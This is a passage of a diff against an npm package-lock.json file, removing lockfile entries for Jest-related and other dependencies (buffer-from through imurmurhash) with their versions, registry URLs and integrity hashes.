{ - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" - } - }, - "node_modules/ci-info": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.3.0.tgz", - "integrity": "sha512-riT/3vI5YpVH6/qomlDnJow6TBee2PBKSEpx3O32EGPYbWGIRsIlGRms3Sm74wYE1JMo8RnO04Hb12+v1J5ICw==", - "dev": true - }, - "node_modules/cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "dependencies": { - "jake": "^10.8.5" - }, - "bin": { - "ejs": "bin/cli.js" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "dependencies": { - "minimatch": "^5.0.1" - } - }, - "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/filelist/node_modules/minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/foreground-child/node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "deprecated": "Glob versions prior to v9 are no longer supported", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", - "integrity": "sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - 